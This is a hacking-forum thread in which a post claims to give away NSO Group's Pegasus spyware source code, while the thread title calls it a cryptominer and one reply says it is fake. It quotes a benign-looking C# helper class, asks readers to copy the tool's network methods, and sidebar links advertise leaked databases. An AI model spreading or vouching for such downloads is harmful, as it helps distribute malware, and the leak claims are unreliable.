Temporary Advertisements:
Ad
Ad
Ad
SOURCE CODE Cryptominer in Fake Pegasus Spyware
by viceCoolMan - Tuesday December 31, 2024 at 01:31 PM
#21
How to use i can anyonw tell me
Reply
#22
This is not the original PEGASUS bro

(Jan 04, 2025, 11:02 AM)blackpillow Wrote: How to use i can  anyonw tell me

USE it for Reverse Engineering and Study. Although i have the Original PEGASUS. The OG from NSO ISRAEL.
Reply
#23
(Jan 04, 2025, 11:04 AM)ravi_22_07 Wrote: This is not the original PEGASUS bro

(Jan 04, 2025, 11:02 AM)blackpillow Wrote: How to use i can  anyonw tell me

USE it for Reverse Engineering and Study. Although i have the Original PEGASUS. The OG from NSO ISRAEL.

what u heva pegasus , can you share and also how is it work like the pegasus
Reply
#24
(Dec 31, 2024, 01:31 PM)viceCoolMan Wrote:
The NSO Group is an Israeli company that makes advanced cyber tools.
Today I bring you the source code for their Zero Click spyware.


This was posted on BF in November but was taken down. Government entities have paid for this so here it is for free.
Check out the custom protocols and how they handle the network traffic. I recommend you take inspiration from these communication methods as they are quite cool.


PM me if the link stops working, information should be free.
Proof: 
Quote:using System;
using System.IO;
using System.Linq;
using System.Text;
using PEGASUS.Cryptografhsh;
namespace PEGASUS.Tools.Helper
{
public static class FileHelper
{
private const string CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
private static readonly Random _rnd = new Random(Environment.TickCount);
private static readonly string[] _sizes = new string[4] { "B", "KB", "MB", "GB" };
private static readonly char[] _illegalChars = Path.GetInvalidPathChars().Union(Path.GetInvalidFileNameChars()).ToArray();
public static bool CheckPathForIllegalChars(string path)
{
return path.Any((char c) => _illegalChars.Contains©);
}
public static string GetRandomFilename(int length, string extension = "")
{
StringBuilder stringBuilder = new StringBuilder(length);
for (int i = 0; i < length; i++)
{
stringBuilder.Append("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[_rnd.Next("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".Length)]);
}
return stringBuilder.ToString() + extension;
}
public static int GetNewTransferId(int o = 0)
{
return _rnd.Next(0, int.MaxValue) + o;
}
public static string GetDataSize(long size)
{
double num = size;
int num2 = 0;
while (num >= 1024.0 && num2 + 1 < _sizes.Length)
{
num2++;
num /= 1024.0;
}
return $"{num:0.##} {_sizes[num2]}";
}
public static int GetFileIcon(string extension)
{
if (string.IsNullOrEmpty(extension))
{
return 2;
}
switch (extension.ToLower())
{
default:
return 2;
case ".exe":
return 3;
case ".txt":
case ".log":
case ".conf":
case ".cfg":
case ".asc":
return 4;
case ".rar":
case ".zip":
case ".zipx":
case ".tar":
case ".tgz":
case ".gz":
case ".s7z":
case ".7z":
case ".bz2":
case ".cab":
case ".zz":
case ".apk":
return 5;
case ".doc":
case ".docx":
case ".odt":
return 6;
case ".pdf":
return 7;
case ".jpg":
case ".jpeg":
case ".png":
case ".bmp":
case ".gif":
case ".ico":
return 8;
case ".mp4":
case ".mov":
case ".avi":
case ".wmv":
case ".mkv":
case ".m4v":
case ".flv":
return 9;
case ".mp3":
case ".wav":
case ".pls":
case ".m3u":
case ".m4a":
return 10;
}
}
public static void WriteLogFile(string filename, string appendText)
{
appendText = ReadLogFile(filename) + appendText;
using FileStream fileStream = File.Open(filename, FileMode.Create, FileAccess.Write);
byte[] array = AES.Encrypt(Encoding.UTF8.GetBytes(appendText));
fileStream.Seek(0L, SeekOrigin.Begin);
fileStream.Write(array, 0, array.Length);
}
public static string ReadLogFile(string filename)
{
if (!File.Exists(filename))
{
return string.Empty;
}
return Encoding.UTF8.GetString(AES.Decrypt(File.ReadAllBytes(filename)));
}
}
}
 
Seems pretty interesting

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#25
Can you please recheck the link
Reply
#26
thanks so much, i try download it
Reply
#27
glink worked thx

very very real bro this a fucking big leaks in worlds
Reply
#28
This is good classic data
Reply
#29
(Jan 04, 2025, 11:04 AM)ravi_22_07 Wrote: This is not the original PEGASUS bro

(Jan 04, 2025, 11:02 AM)blackpillow Wrote: How to use i can  anyonw tell me

USE it for Reverse Engineering and Study. Although i have the Original PEGASUS. The OG from NSO ISRAEL.


Hi van you send here Pegasus original NSO source code and how to learn reverse engineering?

Hi van you here free link please link with space?
Reply
#30
teşekkürler good share
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Leaks ALL DATABASE tlgfr 16 4,772 7 minutes ago
Last Post: ephraimsnr0023
  [HQ METHOD] DOGE MONEY - $499 Per Day Anonymous System Encr 4 483 16 minutes ago
Last Post: zzzzzzzerzzererzzerz
  Telegram base 2019 - 2023 [Repost] Tanaka 123 10,396 2 hours ago
Last Post: Mrjangir
Star Israel database 0rsted_ 40 4,571 2 hours ago
Last Post: Numbness
  Canada Beauty Saloon 1M Database [ Free ] Vyntra 29 3,916 2 hours ago
Last Post: urcute250682

Forum Jump:


 Users browsing this forum: 1 Guest(s)